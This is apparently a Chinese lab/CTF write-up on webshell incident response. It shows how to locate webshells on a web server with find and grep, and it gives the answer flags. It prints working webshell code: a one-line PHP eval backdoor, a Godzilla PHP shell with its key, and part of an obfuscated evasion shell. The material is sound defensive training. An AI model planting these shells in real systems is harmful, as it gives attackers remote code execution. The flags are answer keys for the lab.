玄机靶场--第一章 应急响应-webshell查杀

文章目录

• • [第一章 应急响应-webshell查杀](#第一章 应急响应-webshell查杀)
  • • • [1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}](#1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx})
      • [2.黑客使用的什么工具的shell github地址的md5 flag{md5}](#2.黑客使用的什么工具的shell github地址的md5 flag{md5})
      • [3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx](#3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx)
      • [4.黑客免杀马完整路径 md5 flag{md5}](#4.黑客免杀马完整路径 md5 flag{md5})
      • 利用工具查杀

题目简介

第一章 应急响应-webshell查杀

靶机账号密码 root xjwebshell
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}

1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}

可以尝试搜索jsp、php、asp、aspx这几种特殊后缀文件，并尝试寻找其中的危险函数来查找webshell。

//搜索目录下适配当前应用的网页文件，查看内容是否有Webshell特征
find ./ type f -name "*.jsp" | xargs grep "exec(" 
find ./ type f -name "*.php" | xargs grep "eval(" 
find ./ type f -name "*.asp" | xargs grep "execute(" 
find ./ type f -name "*.aspx" | xargs grep "eval(" 

命令解析：

find ./ type f -name "*.php" | xargs grep "eval(" 

• find ./ type f -name "*.php"：在当前目录及子目录下，寻找以.php后缀结尾的文件。，输出其文件路径。
• xargs：xargs会将前面所得到的文件对应的路径，传递给grep，并且让 grep 在每个文件的内容中查找。
• grep "eval(" ：在文件内容中查找字符串 "eval("

root@ip-10-0-10-1:/var/www/html# find ./ type f -name "*.jsp" | xargs grep "exec(" 
find: 'type': No such file or directory
find: 'f': No such file or directory
root@ip-10-0-10-1:/var/www/html# find ./ type f -name "*.php" | xargs grep "eval(" 
find: 'type': No such file or directory
find: 'f': No such file or directory
./include/gz.php:               eval($payload);
./include/Db/.Mysqli.php:               eval($payload);
./shell.php:<?php phpinfo();@eval($_REQUEST[1]);?>
root@ip-10-0-10-1:/var/www/html# find ./ type f -name "*.asp" | xargs grep "execute(" 
find: 'type': No such file or directory
find: 'f': No such file or directory
root@ip-10-0-10-1:/var/www/html# find ./ type f -name "*.aspx" | xargs grep "eval("
find: 'type': No such file or directory
find: 'f': No such file or directory

可以得到gz.php、.Mysqli.php、shell.php这三个webshell文件。

在gz.php中，注释部分即为flag。gz.php文件内容如下：

<?php
@session_start();	//启动会话
@set_time_limit(0); //设置脚本执行时间限制为无限制
@error_reporting(0);//关闭错误报告
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
//027ccd04-5065-48b6-a32d-77c704a5e26d
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
                eval($payload);
        echo encode(@run($data),$key);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

2.黑客使用的什么工具的shell github地址的md5 flag{md5}

哥斯拉PHP马经典特征：

• session_start() 创建或者重启一个会话
• @set_time_limit(0) 设置程序最长运行时间 永远
• @error_reporting(0) 关闭错误报告
• $key=xxxxxxxxx 加解密的盐值

观察gz.php中前三行，以及key值，可以得知这是哥斯拉的webshell

Godzilla项目地址：https://github.com/BeichenDream/Godzilla
md5加密：39392DE3218C333F794BEFEF07AC9257

flag{39392DE3218C333F794BEFEF07AC9257}

3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx

linux下的隐藏文件或隐藏目录特征：

• 以.开头
• 直接使用ls命令无法查看，需要加上-a参数
• 可以通过文件绝对路径访问

1、可以通过对比ls命令与ls -la命令的输出结果寻找这个隐藏文件

root@ip-10-0-10-1:/var/www/html/include/Db# ls -la
total 36
drwxr-xr-x 2 www-data www-data 4096 Aug  2  2023 .
drwxr-xr-x 4 www-data www-data 4096 Aug  2  2023 ..
-rw-r--r-- 1 www-data www-data  768 Aug  2  2023 .Mysqli.php
-rwxr-xr-x 1 www-data www-data 4752 Mar 14  2021 Mysqli.php
-rwxr-xr-x 1 www-data www-data 4921 Mar 14  2021 Mysql.php
-rwxr-xr-x 1 www-data www-data 4433 Mar 14  2021 Sqlite.php

2、可以通过搜索以.开头的文件

root@ip-10-0-10-1:/var/www/html# find ./ -type f -name ".*"
./data/.DS_Store
./template/taoCMS/.DS_Store
./template/.DS_Store
./.htaccess
./include/Model/.DS_Store
./include/Db/.Mysqli.php
./include/.DS_Store
./admin/template/images/xheditor/xheditor_skin/nostyle/img/.DS_Store
./admin/template/images/xheditor/xheditor_skin/nostyle/.DS_Store
./admin/template/images/xheditor/xheditor_skin/.DS_Store
./admin/.DS_Store

通过这两种方法都可以找到.Mysqli.php这个文件

路径：/var/www/html/include/Db/.Mysqli.php
MD5加密：AEBAC0E58CD6C5FAD1695EE4D1AC1919

flag{AEBAC0E58CD6C5FAD1695EE4D1AC1919}

4.黑客免杀马完整路径 md5 flag{md5}

免杀马，要么做编码处理 要么做变量嵌套 要么函数调用要么类调用等等

php免杀马编码处理通常使用字符串异或加密、base家族加密、rot13加密 字符串拼接等方式实现。

可以通过匹配加解密函数来寻找，这里寻找base64解密函数base64_decode()

root@ip-10-0-10-1:/var/www/html# find ./ type f -name "*.php" | xargs grep "base64_decode" 
find: 'type': No such file or directory
find: 'f': No such file or directory
./wap/top.php:$fun = base64_decode($_GET['func']);

得到top.php内容如下：

<?php
$key = "password";

//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){
    $fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];

top.php路径：/var/www/html/wap/top.php
MD5加密：eeff2eabfd9b7a6d26fc1a53d3f7d1de

flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}

利用工具查杀

将/var/www/html目录下的文件dump下来，这里使用D盾扫描。

扫描出的第二个木马gz.php，其中的注释部分即为第一问答案。

分析gz.php，根据前三行和key即可得知是哥斯拉木马流量特征，得到第二问答案。

扫描出的第三个木马top.php，即为免杀马。得到第四问答案。

扫描出的第四个木马.Mysqli.php，即为隐藏shell。得到第三问的答案。